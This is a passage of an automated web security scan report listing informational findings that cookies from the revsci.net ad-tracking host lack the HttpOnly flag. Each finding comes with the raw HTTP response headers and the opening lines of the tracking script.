Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:00 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.376. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/449293090.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30xvkVUA6Ab/nfpD5Q==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/
NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:13:02 GMT; Path=/
udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30xvkVUA6Ab/nfpD5Q==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/
Set-Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:13:02 GMT; Path=/
Set-Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:02 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:13:01 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

12.377. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/449293090.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCVyCyiOI0VkRNa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:44 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6484&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCVyCyiOI0VkRNa9Q=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:44 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6484&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:44 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:44 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.378. http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/536378960.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkGTSOM1VkQHa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69ODFkGTSOM1VkQHa9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:19 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98af&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:19 GMT; Path=/
X-Proc-ms: 9
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:18 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.379. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/555347891.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zvUZeC6gb/mh9D/g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:06 GMT; Path=/
NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e82&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt30zvUZeC6gb/mh9D/g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:13:06 GMT; Path=/
Set-Cookie: NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e82&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:13:06 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:13:06 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

12.380. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/555347891.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV+ETiSM1VkRda9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:53 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648d&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV+ETiSM1VkRda9U=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:53 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648d&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:53 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:52 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.381. http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/591799300.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbWkv8fV+8er9duzVms+8pMh; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbWkv8fV+8er9duzVms+8pMh; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:24 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.382. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/605657366.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt34zskdUB6Ab/neJD5g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
NETID01=TUl0eAwBEwoAAEDC0IAAAACS; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:12:56 GMT; Path=/
udm_0=MLvv7iEOIS5n5S4sf9LIKtCBJlhlZ4wlO6B9VyvkGoyzMH7D2WQp3ftWI0PMoz9Hh9fKDp1/mUeaTVZAD2sUmSEumxXf7qTHeaTajtWig78dOo0vtnm9lh8+PcN1S2PGKsPZZhZd3IPo8wA3CBgyCxs8roLRagKRmKL+IMR2fkwptAZa7ZnjONj5PBl6mDenKzm6tvDzGiI2xJiEk+JZoEy3cJ7GsQ44kugPJQK2nLpvRboqevnJkiBn6cJUdF9g9l3Et37CRe44hpuXi4fQkPD6PSZagwqV8pwbYPDiSFUj/WYyu4jDKt6kZPsKfD8M97H9xnvsE8qaHADuNwoV3tqyK7nasBcM7aGO5JMRBtADmLpzlYS49Sgt+u92fAIOU8AWl4KqYMZQI63CJllHgWon/3yB0KkEhW5Ny6TGpSnYrUPRdHHIuyXVTbI2gihM4dqmj4m4wN4Z7tLwGL08cATb+7MzVV0mVwn4K9KsfwH9fFRLpJ+FUxk4edQ0kYnub2d/j8VnHB5QhQQgzJCswhu/UdS2f1SiTrmriDroOArOp6Z03WAkULU7; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby+s31dKt34zskdUB6Ab/neJD5g==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
Set-Cookie: NETID01=TUl0eAwBEwoAAEDC0IAAAACS; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:12:56 GMT; Path=/
Set-Cookie: udm_0=MLvv7iEOIS5n5S4sf9LIKtCBJlhlZ4wlO6B9VyvkGoyzMH7D2WQp3ftWI0PMoz9Hh9fKDp1/mUeaTVZAD2sUmSEumxXf7qTHeaTajtWig78dOo0vtnm9lh8+PcN1S2PGKsPZZhZd3IPo8wA3CBgyCxs8roLRagKRmKL+IMR2fkwptAZa7ZnjONj5PBl6mDenKzm6tvDzGiI2xJiEk+JZoEy3cJ7GsQ44kugPJQK2nLpvRboqevnJkiBn6cJUdF9g9l3Et37CRe44hpuXi4fQkPD6PSZagwqV8pwbYPDiSFUj/WYyu4jDKt6kZPsKfD8M97H9xnvsE8qaHADuNwoV3tqyK7nasBcM7aGO5JMRBtADmLpzlYS49Sgt+u92fAIOU8AWl4KqYMZQI63CJllHgWon/3yB0KkEhW5Ny6TGpSnYrUPRdHHIuyXVTbI2gihM4dqmj4m4wN4Z7tLwGL08cATb+7MzVV0mVwn4K9KsfwH9fFRLpJ+FUxk4edQ0kYnub2d/j8VnHB5QhQQgzJCswhu/UdS2f1SiTrmriDroOArOp6Z03WAkULU7; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:12:56 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 645
Date: Wed, 02 Feb 2011 15:12:56 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{3}$)/,'$1');
rsiDom=rsiDom.
...[SNIP]...

12.383. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/605657366.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC16GSieI1VkRva98=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:36 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LC16GSieI1VkRva98=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:36 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e647c&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:36 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:35 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.384. http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/664658967.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+HSaKI0VkQza9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:12 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:12 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl+HSaKI0VkQza9E=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:12 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a0&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:12 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:12 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.385. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/669682607.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV6GSaeI0VkRfa9g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:56 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6490&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV6GSaeI0VkRfa9g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:56 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6490&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:56 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:55 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

12.386. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js previous next

Summary

Severity:	Information
Confidence:	Certain
